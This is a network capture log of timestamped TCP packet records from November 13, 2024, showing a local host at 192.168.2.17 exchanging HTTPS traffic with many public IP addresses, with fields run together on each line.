                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410125971 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410151005 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410157919 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410192966 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410201073 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410876989 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410973072 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.410976887 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411020994 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411065102 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411070108 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411360025 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411391973 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411499977 CET44349868151.101.193.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411545992 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.411555052 CET49868443192.168.2.17151.101.193.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.417886019 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.417954922 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.417980909 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.417989969 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418016911 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418029070 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418032885 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418128967 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418173075 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418323040 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418339014 CET4434985713.225.78.53192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418354988 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.418418884 CET49857443192.168.2.1713.225.78.53
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.440083981 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.486807108 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.486996889 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.487009048 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.487298965 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.487694025 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.487752914 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.487809896 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.501188040 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.501372099 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.501379967 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.501672029 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.501944065 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.502001047 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.502059937 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.531327009 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.536571980 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.541655064 CET44349864104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.541918039 CET44349864104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.541990995 CET49864443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.542592049 CET49864443192.168.2.17104.26.5.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.542606115 CET44349864104.26.5.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.543334961 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544581890 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544634104 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544683933 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544713020 CET49866443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544754028 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544794083 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.544845104 CET49866443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.545772076 CET49866443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.545804977 CET44349866104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.548801899 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.548845053 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.549105883 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.549324989 CET49884443192.168.2.17104.26.4.39
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.549340963 CET44349884104.26.4.39192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.552577972 CET49870443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.591427088 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.591679096 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.591708899 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.592768908 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.592830896 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.593883991 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.594105959 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.594111919 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.594121933 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.595066071 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.635231972 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.635509014 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.635519981 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.636001110 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.636063099 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.636995077 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.637098074 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.637379885 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.637379885 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.637455940 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.647546053 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.647547007 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.647555113 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.671344995 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.671575069 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.671586990 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.673115015 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.673181057 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.674206972 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.674288034 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.674595118 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.674613953 CET4434986254.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.679677010 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.679702997 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.695540905 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.720534086 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.720849037 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.720936060 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.721676111 CET49876443192.168.2.17151.101.1.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.721700907 CET44349876151.101.1.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.722985983 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.723278046 CET49872443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.723294020 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.723634958 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724057913 CET49872443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724121094 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724972963 CET49872443192.168.2.1713.225.78.57
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.727576971 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.727576971 CET49862443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.738914967 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.738945961 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.739078045 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.739665031 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.739851952 CET49885443192.168.2.17142.250.181.226
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.739867926 CET44349885142.250.181.226192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740005970 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740024090 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740359068 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740760088 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740760088 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.740818024 CET44349879150.171.27.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.744148970 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.744177103 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.744311094 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.744455099 CET49886443192.168.2.17151.101.65.140
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.744467974 CET44349886151.101.65.140192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761356115 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761379957 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761388063 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761430979 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761437893 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761465073 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761476040 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.761537075 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.762098074 CET49865443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.762106895 CET4434986599.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.771332026 CET4434987213.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.773708105 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.773737907 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.773837090 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.774044991 CET49887443192.168.2.1799.86.8.175
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.774054050 CET4434988799.86.8.175192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789263010 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789295912 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789365053 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789540052 CET49888443192.168.2.1718.244.18.115
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789551973 CET4434988818.244.18.115192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.789567947 CET49879443192.168.2.17150.171.27.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.797854900 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.797890902 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.797959089 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.797969103 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.798043013 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.800826073 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.800839901 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.801120043 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.801359892 CET49889443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.801371098 CET44349889157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.826489925 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.826649904 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.826662064 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.827569008 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.827631950 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.827847004 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.827903986 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.827948093 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.837070942 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.837263107 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.837272882 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.838236094 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.838301897 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.839307070 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.839378119 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.839502096 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.839509010 CET44349874142.250.185.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.843106031 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.843297005 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.843305111 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.844734907 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.844785929 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.845043898 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.845119953 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.845206022 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.845213890 CET44349878157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.868554115 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.868566036 CET4434987513.32.27.86192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.875354052 CET4434987013.225.78.57192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.878793955 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.878834009 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.879093885 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.879296064 CET49891443192.168.2.1718.66.102.15
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.879308939 CET4434989118.66.102.15192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.884566069 CET49878443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.884577036 CET49874443192.168.2.17142.250.185.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.891400099 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.891658068 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.891669989 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892553091 CET4434988091.228.74.166192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892606974 CET49880443192.168.2.1791.228.74.166
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892694950 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892728090 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892754078 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892761946 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892775059 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892792940 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892798901 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892813921 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892824888 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892837048 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892863035 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.892865896 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.893412113 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895034075 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895054102 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895083904 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895096064 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895126104 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895131111 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895150900 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895165920 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895169020 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895174026 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895190954 CET44349839143.204.98.128192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895193100 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.895225048 CET49839443192.168.2.17143.204.98.128
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.916568041 CET49875443192.168.2.1713.32.27.86
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917041063 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917076111 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917093039 CET44349873150.171.28.10192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917118073 CET49873443192.168.2.17150.171.28.10
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.917179108 CET49873443192.168.2.17150.171.28.10
